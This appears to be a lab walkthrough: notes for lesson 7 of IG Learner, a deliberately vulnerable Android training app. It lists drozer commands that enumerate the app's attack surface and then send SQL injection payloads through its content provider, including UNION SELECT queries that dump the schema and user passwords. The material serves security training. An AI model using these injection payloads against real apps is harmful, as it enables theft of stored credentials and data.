IG Learner Lesson 7: SQL Injection Exploitation in android application data provider with drozer
Text to Speech
Refference:
https://intrepidusgroup.com/tools/armor/IGLearnerWalkthrough/IGLearnerWalkthrough.html
Lesson 7: SQL Injection Exploitation in android application data provider with drozer
adb install agent.apk
adb forward tcp:31415 tcp:31415
drozer.bat console connect
list
run app.package.list
run app.package.list -f learner
run app.package.info -a com.intrepidusgroup.learner
run app.package.attacksurface com.intrepidusgroup.learner
run app.activity.info -a com.intrepidusgroup.learner
run app.provider.info -a com.intrepidusgroup.learner
run scanner.provider.injection -a com.intrepidusgroup.learner
run app.provider.query content://com.intrepidusgroup.learner.contentprovider/iglearnerdb
run scanner.provider.finduris -a com.intrepidusgroup.learner
run app.provider.query content://com.intrepidusgroup.learner.contentprovider/iglearnerdb/ --selection "'1'='1') union all select name,sql,3,4 from sqlite_master;"
run app.provider.query content://com.intrepidusgroup.learner.contentprovider/iglearnerdb/ --selection "'1'='1') union all select user,password,3,4 from users;"
run app.provider.query content://com.intrepidusgroup.learner.contentprovider/iglearnerdb/ --selection "'1'='0') union all select user,password,3,4 from users;"
First activity/intent that will start:
run app.package.launchintent com.intrepidusgroup.learner
2015-04-28 12:01:13
source
Gloss